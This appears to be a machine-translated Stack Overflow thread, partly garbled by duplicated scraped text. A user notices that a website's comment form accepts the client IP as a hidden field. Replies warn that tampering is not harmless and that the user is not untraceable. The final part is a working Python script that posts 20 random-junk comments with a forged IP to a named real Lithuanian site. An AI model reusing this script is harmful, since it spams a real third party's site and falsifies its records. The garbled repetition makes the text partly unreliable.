Python 网站天真地将IP作为一种形式参数——我是不可追踪的吗?
注1:我没有网络编程经验。 注2:我没有做任何伤害。评论被自动删除,我不打算做一个变通办法,尽管我认为我可以。我只是在玩 这是一些网站的评论形式:Python 网站天真地将IP作为一种形式参数——我是不可追踪的吗?,python,forms,python-3.x,post,ip,Python,Forms,Python 3.x,Post,Ip,注1:我没有网络编程经验。 注2:我没有做任何伤害。评论被自动删除,我不打算做一个变通办法,尽管我认为我可以。我只是在玩 这是一些网站的评论形式: <form method="post" target="_top" action="index.php" name="akocommentform" /> <input type="hidden" value="com_akocomment" name="option"></input> <input typ
<form method="post" target="_top" action="index.php" name="akocommentform" />
<input type="hidden" value="com_akocomment" name="option"></input>
<input type="hidden" value="106" name="acitemid"></input>
<input type="hidden" value="20805" name="contentid"></input>
<input type="hidden" value="XX.XX.XXX.XXX" name="ip"></input> # My IP, as a form arg
<input type="hidden" value="entry" name="func"></input>
... stuff ...
<input class="inputbox" type="text" style="width: 250px;" title="Vardas" alt="Vardas" value="" name="acname"></input>
<input type="hidden" value="0" name="iduser"></input>
... more stuff ...
<textarea class="inputbox" wrap="virtual" title="Komentaras" name="comment" rows="8" style="width: 250px; height: 120px;"></textarea>
现在我有两个问题:
- 如果这是网站用来接收评论的唯一代码,它怎么可能在数据库中用错误的IP跟踪我
你所做的不是“玩”,可能会给你带来很多麻烦。如果你想做实验,你应该学会如何在自己的电脑上设置实验。你的两个问题都不是关于这个主题的。我们不知道那个人是谁,所以我们不知道他们是“忘了”还是完全不知道安全101。它是否合法取决于一大堆东西。我们不是律师。(顺便说一句:你一点也不是不可追踪的。如果你相信这一点,你也需要学习《网络安全101》:-)“这合法吗”删除了对股票的猜测。据我们所知,他们可能已经打电话给FBI,因为他们跟踪表单子IP地址和实际TCP端点连接地址之间的不匹配。他们很生气你发表评论,方便吗?老实说,谁知道呢?我们不是表格的作者,好吧,我现在明白了。因此,该网站知道我的真实IP,可能也会跟踪它,并记录我的评论IP以方便(可能)使用,例如快速评论IP查找或其他。谢谢好吧,我不会再这样做了。很抱歉
import requests
from random import choice, randrange as rr
from string import ascii_letters as letters
def fake_ip():
return str(rr(256))+'.'+str(rr(256))+'.'+str(rr(256))+'.'+str(rr(256))
comment = ''.join([choice(letters) for x in range(1000)])
name = ''.join([choice(letters) for x in range(15)])
payload = {
'option' : 'com_akocomment',
'acitemid' : '106',
'contentid' : '20586',
'ip' : fake_ip(), # IT WORKS!
'func' : 'entry',
'iduser' : '0',
'acname' : name,
'comment' : comment }
for i in range(20):
response = requests.post('http://www.nyksciai.lt', data=payload)
print (response.status_code, response.reason)